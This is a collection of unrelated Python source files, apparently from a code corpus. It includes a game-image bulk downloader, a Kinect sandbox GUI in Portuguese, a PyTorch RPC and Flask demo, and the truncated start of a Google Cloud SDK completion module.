install_btn_wait_time = 0
while install_btn_wait_time <= self.timeout:
install_btn_wait_time += 1
time.sleep(1)
install_btn_xy = self.__match_image('install.png')
if install_btn_xy is not False:
self.__tap(install_btn_xy, 'install')
return True
self.log.warning(f'ID {itunes_id}: No install button found after {self.timeout}s')
return False
|
pyGBFweapon.py
|
# 批量下载GBF武器立绘
from queue import Queue
import os
import time
import threading
import urllib.request
import urllib.error
import datetime
import sys
sys.path.append(".")
import pyDownload as download
dirname = os.getcwd()
print_lock = threading.Lock()
data_q = Queue()
SAVELINK = False
DEBUG = False
# chara[R/SR/SSR/skin] quest[r/sr/ssr/extra] summon[n/r/sr/ssr] zoom[r/sr/ssr/skin] mypage[r/sr/ssr/skin] class cover bg chara[extra] zoom[extra]
groupstack = [-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1,]
grouptop = [0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0]
prefix1 = "http://game-a1.granbluefantasy.jp/assets/img/sp/assets/weapon/"
groupstr = ["100","101","102","103","104","105","106","107","108","109",
"200","201","202","203","204","205","206","207","208","209",
"300","301","302","303","304","305","306","307","308","309",
"400","401","402","403","404","405","406","407","408","409"]
# chara[R/SR/SSR/skin] quest[r/sr/ssr/extra] summon[n/r/sr/ssr] zoom[r/sr/ssr/skin] mypage[r/sr/ssr/skin] class cover
groupdir = ["img\\weapon\\n","img\\weapon\\r","img\\weapon\\sr","img\\weapon\\ssr"]
#quest extra needs big step
groupstep = [20,20,20,20,20,20,20,20,20,20,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20]
grouplink = ["link\\wp-n.txt","link\\wp-r.txt","link\\wp-sr.txt","link\\wp-ssr.txt"]
MaxThread = 40
def wpimglist(groupid):
list = []
# 3040001000_01
for index in range(groupstack[groupid]+1, groupstack[groupid]+1+groupstep[groupid]):
list.append(imgName(index, groupid, 0))
return list
def mkdir(path):
tmppath = os.getcwd()+"\\"+path
try:
os.makedirs(tmppath)
except:
pass
return tmppath
class imgName:
id = 0
groupid = 0
#dirid = 0
suffix = 1
def __init__(self, id, groupid, suffix = 1):
self.id = id
self.groupid = groupid
#self.dirid = dirid
self.suffix = suffix
def __str__(self):
thisstr = "["+ str(self.id)+","+str(self.groupid)+"]"
return thisstr
def saveIndex(imgData):
time.sleep(0.1)
with print_lock:
imgName = "10"+ groupstr[imgData.groupid] + str(imgData.id).zfill(3)+"00"
iddir = imgData.groupid //10
dir = groupdir[iddir]
count = 0
try:
url = prefix1 + "m/" + imgName +".jpg"
if(download.saveImg(url,dir+"\\m")):
count+=1
if(SAVELINK):
#print(grouplink[imgData.groupid])
#print(imgData.url)
with open(grouplink[iddir],"a") as linkfile:
linkfile.write(url+"\n")
except:
pass
try:
url = prefix1 + "b/" + imgName +".png"
if(download.saveImg(url,dir+"\\b")):
count+=1
if(SAVELINK):
#print(grouplink[imgData.groupid])
#print(imgData.url)
with open(grouplink[iddir],"a") as linkfile:
linkfile.write(url+"\n")
except:
pass
try:
url = prefix1 + "ls/" + imgName +".jpg"
if(download.saveImg(url,dir+"\\ls")):
count+=1
if(SAVELINK):
#print(grouplink[imgData.groupid])
#print(imgData.url)
with open(grouplink[iddir],"a") as linkfile:
linkfile.write(url+"\n")
except:
pass
#update logic
if(count >0 ):
if(imgData.id > groupstack[imgData.groupid]):
print("update list " + groupdir[iddir])
groupstack[imgData.groupid] += groupstep[imgData.groupid]
simglist = []
simglist = wpimglist(imgData.groupid)
for iimg in simglist:
data_q.put(iimg)
simglist.clear()
if(imgData.id>grouptop[imgData.groupid]):
grouptop[imgData.groupid] = imgData.id
def worker():
while True:
imgData1 = data_q.get()
#print(imgData1)
saveIndex(imgData1)
data_q.task_done()
def main():
#socket.setdefaulttimeout(10)
if(sys.version_info.major != 3):
print("This script only works for python3")
return
try:
logdata = ""
with open("img\\weapon\\log.txt") as logfile:
lines = logfile.readlines()
logdata = lines[1]
if (logdata != ""):
data = logdata.split(',')
numgroup = len(groupstack) + 1
if (len(data) == numgroup):
print("download start from latest")
for i in range(0, numgroup):
groupstack[i] = int(data[i])
grouptop[i] = int(data[i])
except:
pass
for x in range(MaxThread):
t = threading.Thread(target = worker)
t.daemon = True
t.start()
for idir in groupdir:
mkdir(idir)
mkdir(idir+"\\m")
mkdir(idir + "\\b")
mkdir(idir + "\\ls")
mkdir("link")
start = time.time()
simglist = []
# init
for index in range(0,40):
simglist = wpimglist(index)
for iimg in simglist:
data_q.put(iimg)
simglist.clear()
data_q.join()
print("entire job took:", time.time()-start)
# today = str(datetime.date.today())
with open("img\\weapon\\log.txt", "w", encoding='utf-8') as logfile:
istr = "weapon [n|r|sr|ssr][sword|blade|spear|axe|staff|gun|fist|bow|harp|katana]\n"
logfile.write(istr)
for ilog in grouptop:
istr = str(ilog)+","
logfile.write(istr)
logfile.write("\n")
if __name__ == '__main__':
main()
os.system("pause")
#appendix
#weapon
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/weapon/m/1040001600.jpg
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/weapon/b/1040001600.png
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/weapon/ls/1040500300.jpg
#image set
#character origin zoom
#skin
#3710001000
# http://game-a.granbluefantasy.jp/assets/img/sp/assets/npc/zoom/3040010000_01.png
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/npc/b/3030007000_01.png
#class
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/leader/job_change/120001_wa_1_01.png
#http://game-a1.granbluefantasy.jp/assets/img/sp/cjs/job_release_180001_1_c.png
#quest character 2 3 4 99
#http://game-a1.granbluefantasy.jp/assets/img/sp/quest/scene/character/body/3040022000.png
#summon 1 2 3 4
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/summon/b/2030011000.png
#mypage class&sr
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/npc/my/3040058000_02.png
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/leader/my/140201_kn_1_01.png
#not used
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/npc/npc_evolution/main/3040071000_02.png
|
main.py
|
import tkinter as tk
from tkinter import ttk
from cv2 import equalizeHist
import numpy as np
import cv2
from openni import openni2
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import cm
from matplotlib.ticker import LinearLocator
import numpy as np
import threading
#==========================================================================================
#create interface
janela = tk.Tk()
h = janela.winfo_screenheight()
w = janela.winfo_screenwidth()
janela.geometry("%dx%d+%d+%d" % (570, 650, ((w/2) - (570/2)),((h/2) - (680/2))))
janela.title("Interface em desenvolvimento")
janela.resizable(width=0, height=0)
a = 10
b = 30
c = 10
d = 25
#==========================================================================================
#variables
var1 = tk.IntVar()
check2 = ttk.Checkbutton(janela, text='Cores', variable= var1)
check2.place(height=20, width=100, x=a, y=(c + 7*b))
var2 = tk.IntVar()
check2 = ttk.Checkbutton(janela, text='Curvas', variable= var2)
check2.place(height=20, width=100, x=6*a + 7, y=(c + 7*b))
selected_gradient = tk.StringVar()
lt = ['COLORMAP_AUTUMN','COLORMAP_BONE' ,
'COLORMAP_JET(PADRÃO)' ,
'COLORMAP_WINTER' ,
'COLORMAP_RAINBOW' ,
'COLORMAP_OCEAN',
'COLORMAP_SUMMER',
'COLORMAP_SPRING',
'COLORMAP_COOL',
'COLORMAP_HSV',
'COLORMAP_PINK',
'COLORMAP_HOT',
'COLORMAP_PARULA',
'COLORMAP_MAGMA',
'COLORMAP_INFERNO',
'COLORMAP_PLASMA',
'COLORMAP_VIRIDIS',
'COLORMAP_CIVIDIS',
'COLORMAP_TWILIGHT',
'COLORMAP_TWILIGHT_SHIFTED',
'COLORMAP_TURBO',
'COLORMAP_DEEPGREEN']
gradi = ttk.Combobox(janela, values = lt, textvariable= selected_gradient)
gradi.set('Estilo de Colormap')
gradi['state'] = 'readonly'
gradi.place(height=20, width=170, x=13*a, y=(c + 7*b))
var3 = tk.IntVar()
list_numbers_curv= [1,3,5,8,10,15,20,30]
numbers_curv = ttk.Combobox(janela, values = list_numbers_curv, textvariable= var3)
numbers_curv.set('Fator de Distância')
numbers_curv['state'] = 'readonly'
numbers_curv.place(height=20, width=125, x=31*a - 8, y=(c + 7*b))
var4 = tk.IntVar()
list_thickness_curv = [1,2,3,4,5,6,7,8]
thickness_curv = ttk.Combobox(janela, values =list_thickness_curv, textvariable= var4)
thickness_curv.set('Espessura da Linha')
thickness_curv['state'] = 'readonly'
thickness_curv.place(height=20, width=125, x=42*a + 9 , y=(c + 7*b))
set_heigth = tk.IntVar()
set_entry = tk.Entry(janela,textvariable = set_heigth)
set_entry.place(height=20, width=50, x=15*a, y=(c + 3*b))
var_a = tk.IntVar()
check_a = ttk.Checkbutton(janela, text='Exibir Altura', variable= var_a)
check_a.place(height=20, width=150, x=a, y=(c + 4*b))
#==========================================================================================
#Initializing kinect and variables
#==========================================================================================
alt_max = 0
dist = 0
found_box = 0
key_set = []
list_var = [2, 1, 1, 5, 1, False]
points_area = []
closed_cal = False
openni2.initialize()
#==========================================================================================
#curve visualization
#==========================================================================================
def exibe_curvas_de_nivel():
"""
Função para definir a exibição das curvas de nível na imagem.
"""
dev = openni2.Device.open_any()
depth_stream = dev.create_depth_stream()
depth_stream.start()
frame = depth_stream.read_frame()
frame_data = frame.get_buffer_as_uint16()
img = np.frombuffer(frame_data, dtype=np.uint16)
n_curvas_de_nivel=30
x_label=np.arange((points_area[0]), points_area[2], 1)
y_label=np.arange((points_area[1]), points_area[3], 1)
x_label, y_label = np.meshgrid(x_label, y_label)
z_label = np.reshape(img, (480, 640))
z_label = z_label[(points_area[1]):(points_area[3]), (points_area[0]):(points_area[2])]
z_label = np.rot90(z_label, 2)
if alt_max == 0:
z_label = np.clip(z_label,(found_box - 400), (found_box))
else:
z_label = np.clip(z_label,(found_box - alt_max), (found_box))
img_d1 = np.ones(np.shape(z_label))*(np.amax(z_label))
z_label = img_d1 - z_label
initial_cmap = cm.get_cmap('jet')
fig, ax = plt.subplots()
CS = ax.contour(x_label, y_label, z_label, n_curvas_de_nivel, cmap= initial_cmap)
ax.clabel(CS, fontsize=9, inline=True)
ax.set_title('Curva de nível')
plt.show()
#==========================================================================================
#3D visualization
#==========================================================================================
def exibe_3d():
"""
Função para fazer a exibição da imagem em três dimensões
"""
dev = openni2.Device.open_any()
depth_stream = dev.create_depth_stream()
depth_stream.start()
frame = depth_stream.read_frame()
frame_data = frame.get_buffer_as_uint16()
img = np.frombuffer(frame_data, dtype=np.uint16)
x_label=np.arange((points_area[0]), points_area[2], 1)
y_label=np.arange((points_area[1]), points_area[3], 1)
x_label, y_label = np.meshgrid(x_label, y_label)
z_label = np.reshape(img, (480, 640))
z_label = z_label[(points_area[1]):(points_area[3]), (points_area[0]):(points_area[2])]
if alt_max == 0:
z_label = np.clip(z_label,(found_box - 400), (found_box))
else:
z_label = np.clip(z_label,(found_box - alt_max), (found_box))
img_d1 = np.ones(np.shape(z_label))*(np.amax(z_label))
z_label = img_d1 - z_label
initial_cmap = cm.get_cmap('jet')
fig, ax = plt.subplots(subplot_kw={"projection": "3d"})
surf = ax.plot_surface(x_label, y_label, z_label, cmap= initial_cmap, linewidth=0, antialiased=True)
ax.zaxis.set_major_formatter('{x:.02f}')
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
#==========================================================================================
#display in real time
#==========================================================================================
def exib_TR(mapoption = list_var[0], walloption= list_var[1], curv = list_var[2], n=list_var[3],
thicknesscurv= list_var[4], h= 100, w= 100, pos1= 1700,alt_max= alt_max ):
"""
Função para fazer a exibição da imagem em três dimensões
:param mapoption:
:param walloption:
:param curv:
:param n:
:param thicknesscurv:
:param h:
:param w:
:param pos:
:return:
"""
dev = openni2.Device.open_any()
depth_stream = dev.create_depth_stream()
depth_stream.start()
botao_exibTR["state"] = tk.DISABLED
botao_calibration1["state"] = tk.DISABLED
botao_calibration2["state"] = tk.DISABLED
def onMouse2(event, x, y, flags, param):
global dist
if event == cv2.EVENT_MOUSEMOVE:
dist = img_d[y, x]
if (type(dist) == np.float32) and (np.isnan(dist)):
dist = int(np.nan_to_num(dist))
elif (type(dist) == np.float32):
dist = int(dist)
while(True):
frame = depth_stream.read_frame()
frame_data = frame.get_buffer_as_uint16()
img = np.frombuffer(frame_data, dtype=np.uint16)
img.shape = (1, 480, 640)
if alt_max == 0:
img = np.clip(img,(pos1 - 400), (pos1))
else:
img = np.clip(img,(pos1 - alt_max), (pos1))
img = (np.ones(np.shape(img))*(np.amax(img))) - img
img_d = np.resize(img, (480, 640))
img_d = np.fliplr(img_d)[(points_area[1]):(points_area[3]), (points_area[0]):(points_area[2])]
img = np.fliplr(img)
img = np.swapaxes(img, 0, 2)
img = np.swapaxes(img, 0, 1)
img = img[(480 -points_area[3]):(480 -points_area[1]), (640 - points_area[2]):(640 - points_area[0])]
alpha = 255 / ((np.amax(img) - np.amin(img)))
beta = -np.amin(img) * alpha
img = cv2.convertScaleAbs((img), alpha=alpha, beta = beta)
img = cv2.medianBlur(img, 19)
img = cv2.rotate(img, cv2.ROTATE_180)
im_color = cv2.applyColorMap(img, mapoption)
im_position = im_color
x = v1.get()
y = v2.get()
res = [x, y]
im_color = cv2.resize(im_color, res, interpolation=cv2.INTER_LINEAR)
imgray = cv2.cvtColor (im_color, cv2.COLOR_BGR2GRAY)
whitewall = (np.ones(im_color.shape))*255
if walloption == 0: wall = whitewall
elif walloption == 1: wall = im_color
if curv == 1:
for i in range(255):
ret, thresh = cv2.threshold (imgray, (n*i), 255, cv2.THRESH_BINARY)
contours, his = cv2.findContours (thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
cv2.drawContours(wall, contours, -1, (0,0,0), thicknesscurv)
deslocamento = np.float32([[1, 0, (v4.get())], [0, 1,( v5.get())]])
wall = cv2.warpAffine(wall, deslocamento, (w, h))
ponto = ((v4.get() + (x/2)), (v5.get() + (y/2)))
rotacao = cv2.getRotationMatrix2D(ponto, v3.get(), 1.0)
wall = cv2.warpAffine(wall, rotacao, (w, h))
cv2.imshow("Tempo Real", (wall))
if (var_a.get() == 1):
cv2.imshow("Altitude", im_position)
cv2.setMouseCallback("Altitude", onMouse2)
texto_view_alt["text"] = "(Mova o Cursor Sobre a Imagem): " + str(dist) + " mm"
cv2.waitKey(34)
if (cv2.getWindowProperty("Altitude", cv2.WND_PROP_VISIBLE) <1) and (var_a.get() == 1):
var_a.set(0)
texto_view_alt["text"] = ""
if (cv2.getWindowProperty("Altitude", cv2.WND_PROP_VISIBLE) >= 1) and (var_a.get() == 0):
cv2.destroyWindow("Altitude")
texto_view_alt["text"] = ""
if (cv2.getWindowProperty("Tempo Real", cv2.WND_PROP_VISIBLE) <1) or (list_var[5] == True):
texto_view_alt["text"] = ""
botao_exibTR["state"] = tk.NORMAL
botao_calibration1["state"] = tk.NORMAL
botao_calibration2["state"] = tk.NORMAL
list_var[5] = False
break
cv2.destroyAllWindows()
#==========================================================================================
#initial calibration
#==========================================================================================
def cal_inicial():
global points_area
dev = openni2.Device.open_any()
depth_stream= dev.create_depth_stream()
depth_stream.start()
tk.messagebox.showinfo("Info", "Clique sobre o vértice superior esquerdo da caixa, depois sobre o vértice inferior direito da caixa.")
if len(points_area) != 0:
points_area = []
def onMouse1(event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
points_area.append(x)
points_area.append(y)
cv2.namedWindow("Selecionar", cv2.WINDOW_AUTOSIZE)
cv2.setMouseCallback("Selecionar", onMouse1)
while (True):
frame = depth_stream.read_frame()
frame_data = frame.get_buffer_as_uint16()
img = np.frombuffer(frame_data, dtype=np.uint16)
img.shape = (1, 480, 640)
img = np.fliplr(img)
img = np.swapaxes(img, 0, 2)
img = np.swapaxes(img, 0, 1)
img = cv2.convertScaleAbs((img), alpha=0.1)
img = cv2.medianBlur(img, 23)
img = equalizeHist(img)
img = cv2.bitwise_not(img)
img = cv2.rotate(img, cv2.ROTATE_180)
cframe_data = cv2.applyColorMap(img, cv2.COLORMAP_JET)
if len(points_area) == 4:
if (points_area[0] >= points_area[2]) or (points_area[1] >= points_area[3]):
tk.messagebox.showinfo("Info", "Clique sobre o vértice superior esquerdo da caixa, depois sobre o vértice inferior direito. Calibre novamente")
points_area = []
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
else:
cframe_data = cframe_data[points_area[1]:points_area[3], points_area[0]: points_area[2]]
cv2.imshow("Selecionar", cframe_data)
cv2.waitKey(34)
if (cv2.getWindowProperty("Selecionar", cv2.WND_PROP_VISIBLE) <1):
if (len(points_area) != 4):
tk.messagebox.showinfo("Info", "Calibre a área da caixa")
points_area = []
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
elif (found_box != 0):
botao_aplic["state"] = tk.NORMAL
botao_exibTR["state"] = tk.NORMAL
botao_curv["state"] = tk.NORMAL
botao_surface["state"] = tk.NORMAL
break
else:
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
if (closed_cal == True):
points_area = []
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
cv2.destroyAllWindows()
#==========================================================================================
#set reference
#==========================================================================================
def set_f():
global key_set
dev = openni2.Device.open_any()
depth_stream = dev.create_depth_stream()
depth_stream.start()
if len(key_set) != 0:
key_set = []
def onMouse2(event, x, y, flags, param):
global found_box
if event == cv2.EVENT_LBUTTONDOWN:
found_box = img_d[y, x]
key_set.append(x)
if (type(found_box ) == np.float32) and (np.isnan(found_box )):
found_box = int(np.nan_to_num(found_box ))
elif (type(found_box ) == np.float32):
found_box = int(found_box )
while(True):
frame = depth_stream.read_frame()
frame_data = frame.get_buffer_as_uint16()
img = np.frombuffer(frame_data, dtype=np.uint16)
img.shape = (1, 480, 640)
img_d = np.resize(img, (480, 640))
img_d = np.fliplr(img_d)
img = np.fliplr(img)
img = np.swapaxes(img, 0, 2)
img = np.swapaxes(img, 0, 1)
img = cv2.convertScaleAbs((img), alpha=0.1)
img = cv2.medianBlur(img, 23)
img = equalizeHist(img)
img = cv2.bitwise_not(img)
img = cv2.rotate(img, cv2.ROTATE_180)
im_color = cv2.applyColorMap(img, cv2.COLORMAP_JET)
cv2.imshow("Alt", (im_color))
cv2.setMouseCallback("Alt", onMouse2)
cv2.waitKey(34)
if (cv2.getWindowProperty("Alt", cv2.WND_PROP_VISIBLE) <1):
tk.messagebox.showinfo("Info", "Selecione distância")
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
if (len(key_set) != 0):
if (len(points_area) == 4):
botao_aplic["state"] = tk.NORMAL
botao_exibTR["state"] = tk.NORMAL
botao_curv["state"] = tk.NORMAL
botao_surface["state"] = tk.NORMAL
break
else:
break
if (closed_cal == True):
botao_aplic["state"] = tk.DISABLED
botao_exibTR["state"] = tk.DISABLED
botao_curv["state"] = tk.DISABLED
botao_surface["state"] = tk.DISABLED
break
cv2.destroyAllWindows()
#==========================================================================================
#change parameters
#==========================================================================================
def maplic():
global list_var
if ((thickness_curv.current() != -1) and (numbers_curv.current() != -1) and (gradi.current() != -1)):
list_var = [gradi.current(),var1.get(),var2.get(),var3.get(),var4.get(), True]
botao_exibTR["state"] = tk.NORMAL
texto_change.place(height=25, width=300, x=22*a, y=(c + 8*b))
else:
tk.messagebox.showerror("Erro", "Defina todos os paramêtros")
#==========================================================================================
#preview permissions
#==========================================================================================
def fal():
texto_change.place_forget()
list_var[5] = False
if list_var == [2, 1, 1, 5, 1, False]:
tk.messagebox.showinfo("Info", "Parâmetros padrão executados")
#==========================================================================================
#set altitude values
#==========================================================================================
def set_alt():
global alt_max
list_var[5] = True
if type(alt_max) == int:
alt_max = (set_heigth.get())
else:
tk.messagebox.showinfo("Digite a distância no formato inteiro, em milímetros")
#==========================================================================================
#quit
#==========================================================================================
def quit_sand():
global closed_cal
list_var[5] = True
closed_cal = True
if tk.messagebox.askokcancel("Sair", "Deseja fechar SandBox?"):
janela.destroy()
else:
list_var[5] = False
closed_cal = False
#==========================================================================================
#Separators
sep1 =ttk.Separator(janela, orient='horizontal')
sep1.place(x=0, y=(d + 2*b), relwidth=1)
sep2 =ttk.Separator(janela, orient='horizontal')
sep2.place(x=0, y=(d + 5*b), relwidth=1)
sep3 =ttk.Separator(janela, orient='horizontal')
sep3.place(x=0, y=(d + 9*b), relwidth=1)
sep4 =ttk.Separator(janela, orient='horizontal')
sep4.place(x=0, y=(d + 16*b), relwidth=1)
sep5 =ttk.Separator(janela, orient='horizontal')
sep5.place(x=0, y=(d + 19*b), relwidth=1)
#==========================================================================================
#scales
v1 = tk.IntVar()
s1 = ttk.Scale( janela, variable = v1,
from_ = 1, to = w,
orient = "horizontal")
s1.set(w/2)
s1.place(height=20, width=400, x=a, y=(c + 11*b))
v2 = tk.IntVar()
s2 = ttk.Scale( janela, variable = v2,
from_ = 1, to = h,
orient = "horizontal")
s2.set(h/2)
s2.place(height=20, width=400, x=a, y=(c + 12*b))
v4 = tk.IntVar()
s4 = ttk.Scale( janela, variable = v4,
from_ = 0, to = w,
orient = "horizontal")
s4.set(w/2)
s4.place(height=20, width=400, x=a, y=(c + 13*b))
v5 = tk.IntVar()
s5 = ttk.Scale( janela, variable = v5,
from_ = 0, to = h,
orient = "horizontal")
s5.set(h/2)
s5.place(height=20, width=400, x=a, y=(c + 14*b))
v3 = tk.IntVar()
s3 = ttk.Scale( janela, variable = v3,
from_ = -180, to = 180,
orient = "horizontal")
s3.set(0)
s3.place(height=20, width=400, x=a, y=(c + 15*b))
#==========================================================================================
#text
texto_calibration1 = ttk.Label(janela, text=" \u27f6 Selecione a Área da Caixa")
texto_calibration1.place(height=25, width=170, x=12*a, y=(15 + 0*b))
texto_calibration2 = ttk.Label(janela, text=" \u27f6 Selecione Fundo da Caixa")
texto_calibration2.place(height=25, width=170, x=12*a, y=(15 + 1*b))
texto_set = ttk.Label(janela, text="Altitude Máxima:")
texto_set.place(height=20, width=100, x=a, y=(c + 3*b))
texto_param = ttk.Label(janela, text="Defina os Parâmetros:")
texto_param.place(height=20, width=300, x=a, y=(c + 6*b))
texto_comp = ttk.Label(janela, text="Comprimento")
texto_comp.place(height=20, width=100, x=44*a, y=(c + 11*b))
texto_larg = ttk.Label(janela, text="Largura")
texto_larg.place(height=20, width=100, x=44*a, y=(c + 12*b))
texto_moveh = ttk.Label(janela, text="Mover (Horizontal)")
texto_moveh.place(height=20, width=115, x=44*a, y=(c + 13*b))
texto_movev = ttk.Label(janela, text="Mover (Vertical)")
texto_movev.place(height=20, width=110, x=44*a, y=(c + 14*b))
texto_girar = ttk.Label(janela, text="Girar")
texto_girar.place(height=20, width=110, x=44*a, y=(c + 15*b))
texto_proj = ttk.Label(janela, text="Projete e Ajuste: (Win + P) \u27f6 (Estender) \u27f6 (Mova a Imagem)")
texto_proj.place(height=25, width=400, x=a, y=(c + 10*b))
texto_change = ttk.Label(janela, text="Parâmetros Alterados, Pressione Exibir.")
texto_mod = ttk.Label(janela, text="Modos de Exibição:")
texto_mod.place(height=25, width=250, x=a, y=(c + 17*b))
texto_view_alt = ttk.Label(janela, text="")
texto_view_alt.place(height=20, width=280, x=10*a, y=(c + 4*b))
#==========================================================================================
#button
botao_calibration1 = ttk.Button(janela, text="Calibrar", command= lambda: threading.Thread(target=cal_inicial).start())
botao_calibration1.place(height=25, width=100, x=a, y=(15 + 0*b))
botao_calibration2 = ttk.Button(janela, text="Calibrar", command= lambda: threading.Thread(target=set_f).start())
botao_calibration2.place(height=25, width=100,x=a, y=(15 + 1*b))
botao_set_top = ttk.Button(janela, text="Set", command= lambda: set_alt())
botao_set_top .place(height=22, width=75, x=21*a, y=(c + 3*b))
botao_exibTR = ttk.Button(janela, text="Exibir", command= lambda:[fal(), threading.Thread(target=exib_TR, args= (list_var[0],list_var[1],
list_var[2],list_var[3],list_var[4], h, w, found_box, alt_max)).start()])
botao_exibTR.place(height=25, width=100, x=a, y=(c + 8*b))
botao_exibTR["state"] = tk.DISABLED
botao_aplic = ttk.Button(janela, text="Aplicar", command= lambda: maplic())
botao_aplic.place(height=25, width=100, x=11*a, y=(c + 8*b))
botao_aplic["state"] = tk.DISABLED
botao_curv = ttk.Button(janela, text="Exibir Curvas", command= lambda: exibe_curvas_de_nivel())
botao_curv.place(height=25, width=100,x=a, y=(c + 18*b))
botao_curv["state"] = tk.DISABLED
botao_surface = ttk.Button(janela, text="Exibir Superfície", command= lambda: exibe_3d())
botao_surface.place(height=25, width=100, x=11*a, y=(c + 18*b))
botao_surface["state"] = tk.DISABLED
botao_exit = ttk.Button(janela, text="Sair", command= lambda: quit_sand())
botao_exit.place(height=25, width=75, x=48*a, y=(10 + 20*b))
#==========================================================================================
#image
imagem = tk.PhotoImage(file="Nero_Preto_SemFundo.PNG")
imagem = imagem.subsample(8, 8)
im = ttk.Label(janela, image=imagem)
im.place(height=25, width=110, x=a, y=(10 + 20*b))
janela.protocol("WM_DELETE_WINDOW", quit_sand)
janela.mainloop()
|
poc.py
|
import os
import time
import torch
torch.multiprocessing.set_sharing_strategy("file_system")
import torch.multiprocessing as mp
import torch.distributed.rpc as rpc
from collections import deque
import datetime
import requests
from flask import Flask
from flask import request
import logging
no_of_saver_processes = 1
world_size = 2 # torch.cuda.device_count()
class feature_cache:
def __init__(self):
self.data = deque([])
def __call__(self, t):
self.data.append(t)
def get(self):
if len(self.data) > 0:
return dict(l=len(self.data), d=self.data.popleft())
else:
return dict(l=len(self.data), d="EMPTY")
def flask_processing(feature_cache_obj):
print("Starting flask_processing")
app = Flask(__name__)
# Suppressing flask logs only to error because we want the input to be accepted by main process
log = logging.getLogger("werkzeug")
log.setLevel(logging.ERROR)
@app.route("/data")
def hello():
return feature_cache_obj.get()
@app.route("/shutdown", methods=["POST"])
def shutdown():
func = request.environ.get("werkzeug.server.shutdown")
if func is None:
raise RuntimeError("Not running with the Werkzeug Server")
func()
return "Server shutting down..."
app.run(host="0.0.0.0", port="9999", debug=False)
return
class cpu_process:
feature_cache_obj = feature_cache()
def __init__(self, rank):
print(f"cpu_process_initialization with rank {rank}")
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = "5555"
rpc.init_rpc(
"saver",
rank=rank,
world_size=world_size + no_of_saver_processes,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
rpc_timeout=0, init_method="env://"
),
)
print(f"Started CPU process {rank}")
cpu_process.run()
@classmethod
def run(cls):
flask_processing(cls.feature_cache_obj)
cpu_process.shutdown()
@staticmethod
def shutdown():
for i in range(world_size):
_ = rpc.remote(f"{i}", cuda_process.shutdown, timeout=0)
rpc.shutdown()
return
@staticmethod
def cacher(t):
cpu_process.feature_cache_obj(t)
class cuda_process:
keep_running = True
def __init__(self, rank):
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = "5555"
rpc.init_rpc(
f"{rank}",
rank=rank,
world_size=world_size + no_of_saver_processes,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
rpc_timeout=0, init_method="env://"
),
)
print(f"Started CUDA process on gpu {rank}")
# Sleep to give the saver process sometime to initialize
time.sleep(5)
self.run(rank)
rpc.shutdown()
return
@classmethod
def shutdown(cls):
cls.keep_running = False
def run(self, rank):
print(f"Started CUDA process on gpu {rank}")
while cuda_process.keep_running:
_ = rpc.remote(
"saver",
cpu_process.cacher,
timeout=0,
args=(
dict(
time=str(datetime.datetime.now()),
data=(torch.ones(10) * rank).tolist(),
),
),
)
time.sleep(5)
return
if __name__ == "__main__":
mp.set_start_method("forkserver", force=True)
print("Starting CPU processes")
p = mp.Process(target=cpu_process, args=(world_size,))
p.start()
print("Starting CUDA processes")
trainer_processes = mp.spawn(cuda_process, nprocs=world_size, join=False)
print("Joining all processes")
print(" IMPORTANT: For a graceful shutdown enter [y/Y] ".center(90, "-"))
s = input()
print(f"Registered {s}")
if s == "y" or s == "Y":
requests.post("http://localhost:9999/shutdown")
trainer_processes.join()
p.join()
print("Processes joined ... Ending")
|
remote_completion.py
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Remote resource completion and caching."""
import abc
import os
import StringIO
import tempfile
import threading
import time
from googlecloudsdk.core import config
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core import resources
from googlecloudsdk.core.resource import resource_registry
from googlecloudsdk.core.util import files
from googlecloudsdk.core.util import platforms
_RESOURCE_FLAGS = {
'compute.projects': ' --project ',
